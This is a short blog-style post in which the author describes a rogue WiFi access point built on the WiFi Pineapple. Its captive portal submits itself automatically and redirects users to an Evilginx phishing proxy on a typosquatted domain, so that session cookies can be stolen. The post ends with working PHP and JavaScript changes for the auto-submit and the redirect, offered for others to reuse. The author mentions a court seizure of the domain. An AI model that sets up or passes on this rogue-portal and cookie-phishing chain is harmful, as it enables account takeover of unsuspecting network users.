Evil Portal ++

[Street]

I created a custom Evil Portal landing page for the WiFi Pineapple. On joining the rouge access point Evil Portal opens up a Captive Portal. This is what normally is used by WiFi networks to register users before letting them onto the internet. You can phish for credentials this way usually with the Pineapple. However, I wanted to do something different. I wanted to send the users to another site after they register.

By adding a line of javascript to the body tag in the evil portal index.html page, the javascript automatically triggered the form button on the page. Then I changed the code which refreshed the evil portal page after the form button was triggered to load the page I wanted.

Finally I installed Evilginx on the new server. Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

Once that was up & running I squatted on another domain name. Replacing one letter of the name with a dash. It was something like www.mydom-in.com

The website stole the cookies and allowed me to hack my own account. However, my domain name was seized by the courts recently. Even though I never hacked anyone but myself. I have been keeping all of this & my code secret but don't want my adventure to be lost.  So here you go guys!

I changed this in index.php:

<BODY onload="document.forms['member_signup'].submit()">
       <div style="text-align: center;">
            <h1>Connecting to WiFi.</h1>            
            <p>The SSID you are connected to is <?=getClientSSID($_SERVER['REMOTE_ADDR']);?></p>
            <p>Your host name is <?=getClientHostName($_SERVER['REMOTE_ADDR']);?></p>
            <p>Your MAC Address is <?=getClientMac($_SERVER['REMOTE_ADDR']);?></p>
            <p>Your internal IP address is <?=$_SERVER['REMOTE_ADDR'];?></p>

            <form method="POST" action="/captiveportal/index.php" name="member_signup">
                <input type="hidden" name="target" value="<?=$destination?>">
                <button type="submit">Authorize</button>
            </form>

        </div>

    </BODY>

Change this in /www/captiveportal/Portal.php:

    /**
     * Where to redirect to on successful authorization.
     */
    protected function redirect()
    {
        header('Location: https://www.google.com');
    }

    /**
     * Override this to do something when the client is successfully authorized.
     * By default it just notifies the Web UI.
     */
    protected function onSuccess()
    {
        header('Location: https://www.google.com');
    }